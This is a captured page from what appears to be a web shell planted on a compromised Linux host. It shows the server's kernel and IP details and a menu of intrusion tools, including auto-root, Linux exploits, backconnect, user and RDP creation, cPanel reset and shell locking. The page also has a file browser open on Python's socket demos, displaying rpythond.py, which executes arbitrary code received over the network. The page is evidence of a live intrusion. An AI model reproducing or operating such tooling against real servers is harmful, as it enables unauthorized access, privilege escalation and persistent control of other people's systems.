Linux ip-148-66-134-25.ip.secureserver.net 3.10.0-1160.119.1.el7.tuxcare.els10.x86_64 #1 SMP Fri Oct 11 21:40:41 UTC 2024 x86_64
Apache
: 148.66.134.25 | : 18.224.73.157
66 Domain
8.0.30
amvm
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
usr /
lib64 /
python2.7 /
Demo /
sockets /
[ HOME SHELL ]
Name
Size
Permission
Action
README
628
B
-rw-r--r--
broadcast.py
283
B
-rw-r--r--
broadcast.pyc
546
B
-rw-r--r--
broadcast.pyo
546
B
-rw-r--r--
echosvr.py
739
B
-rwxr-xr-x
echosvr.pyc
826
B
-rw-r--r--
echosvr.pyo
826
B
-rw-r--r--
finger.py
1.23
KB
-rwxr-xr-x
finger.pyc
1.13
KB
-rw-r--r--
finger.pyo
1.13
KB
-rw-r--r--
ftp.py
3.84
KB
-rw-r--r--
ftp.pyc
2.88
KB
-rw-r--r--
ftp.pyo
2.88
KB
-rw-r--r--
gopher.py
9.55
KB
-rwxr-xr-x
gopher.pyc
10.08
KB
-rw-r--r--
gopher.pyo
10.08
KB
-rw-r--r--
mcast.py
2.16
KB
-rwxr-xr-x
mcast.pyc
2.12
KB
-rw-r--r--
mcast.pyo
2.12
KB
-rw-r--r--
radio.py
287
B
-rw-r--r--
radio.pyc
470
B
-rw-r--r--
radio.pyo
470
B
-rw-r--r--
rpython.py
714
B
-rwxr-xr-x
rpython.pyc
981
B
-rw-r--r--
rpython.pyo
981
B
-rw-r--r--
rpythond.py
1.19
KB
-rwxr-xr-x
rpythond.pyc
1.3
KB
-rw-r--r--
rpythond.pyo
1.3
KB
-rw-r--r--
telnet.py
2.94
KB
-rwxr-xr-x
telnet.pyc
2.1
KB
-rw-r--r--
telnet.pyo
2.1
KB
-rw-r--r--
throughput.py
2.04
KB
-rwxr-xr-x
throughput.pyc
2.41
KB
-rw-r--r--
throughput.pyo
2.41
KB
-rw-r--r--
udpecho.py
1.43
KB
-rwxr-xr-x
udpecho.pyc
1.98
KB
-rw-r--r--
udpecho.pyo
1.98
KB
-rw-r--r--
unicast.py
230
B
-rw-r--r--
unicast.pyc
455
B
-rw-r--r--
unicast.pyo
455
B
-rw-r--r--
unixclient.py
232
B
-rw-r--r--
unixclient.pyc
424
B
-rw-r--r--
unixclient.pyo
424
B
-rw-r--r--
unixserver.py
414
B
-rw-r--r--
unixserver.pyc
593
B
-rw-r--r--
unixserver.pyo
593
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : rpythond.py
#! /usr/bin/env python # Remote python server. # Execute Python commands remotely and send output back. # WARNING: This version has a gaping security hole -- it accepts requests # from any host on the Internet! import sys from socket import * import StringIO import traceback PORT = 4127 BUFSIZE = 1024 def main(): if len(sys.argv) > 1: port = int(eval(sys.argv[1])) else: port = PORT s = socket(AF_INET, SOCK_STREAM) s.bind(('', port)) s.listen(1) while 1: conn, (remotehost, remoteport) = s.accept() print 'connected by', remotehost, remoteport request = '' while 1: data = conn.recv(BUFSIZE) if not data: break request = request + data reply = execute(request) conn.send(reply) conn.close() def execute(request): stdout = sys.stdout stderr = sys.stderr sys.stdout = sys.stderr = fakefile = StringIO.StringIO() try: try: exec request in {}, {} except: print traceback.print_exc(100) finally: sys.stderr = stderr sys.stdout = stdout return fakefile.getvalue() main()
Close